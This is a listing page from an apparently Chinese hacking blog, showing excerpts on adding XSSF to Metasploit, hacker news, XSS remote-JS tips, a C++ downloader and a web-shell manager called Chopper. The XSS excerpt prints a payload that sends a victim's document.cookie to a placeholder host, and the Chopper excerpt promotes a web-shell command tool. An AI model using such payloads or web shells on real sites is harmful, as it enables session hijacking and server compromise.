-
为Metasploit添加XSSF模块
在看《Metasploit渗透测试魔鬼训练营》的时候讲的XSSF模块的使用,感觉这个模块很神奇,原理虽然不知道但是觉得应该让大家的Metasploit都添加上这个模块,以备不时之需,本文目的仅仅是分享一下XSSF这个工具的安装和使用方法。 KALI Llinux安装方法: 安装最新的KALI Linux,现在是v1.0...作者:J0s1ph | 分类:黑客攻防 | 围观:283次发表评论
-
职业黑客自述:做得上班族,扮得007
时至今日,一度为新新人类的“黑客”也算现代人认知中的熟练工种了,但他们能办到的事儿,却仍旧在刷新人们的认知底线,比如本周的全国网速大抽风,据安全专家分析,就有可能是黑客所为! 不过一般情况下,主流业界的黑客还算是良民,他们受雇于企业,在网络攻击大战中成为守方的驻防军师。自称45...作者:J0s1ph | 分类:黑客业界 | 围观:287次
-
xss如何加载远程js的一些tips
在早期 , 对于xss我们是这样利用的 <script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script> 将 cookie之类的数据传递到自己的服务端 但是 如果要更为复杂的攻击的话,由于字符串长度等限制 需要加载远程js来实现。 一个简单的例子 <script s...作者:J0s1ph | 分类:黑客攻防 | 围观:208次
-
吐血开源,C++多协议下载引擎.
这是一个我最近写的项目,它是一个下载工具,多协议下载引擎,目前支持HTTP\HTTPS\FTP、粘贴板监控,采用多线程多任务方式进行下载.为什么要开源它?按照目前的状况来看,这个项目的代码写的不是很满意,下载接口不是很清晰,不方便扩展后续功能,就是这些原因;当然我有准备重写一份.以下是该...作者:J0s1ph | 分类:黑客攻防 | 围观:494次
-
网站管理软件-Chopper
免责申明: 请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任! 致谢: 原菜刀某前辈及各位网友的建议 弱点: 存在细节方面没处理好 数据库与菜刀有所区别不能共用 优点: 持续更新 HTTP头自行控制 PHP支持多种执行命令,安全模式...作者:J0s1ph | 分类:黑客攻防 | 围观:285次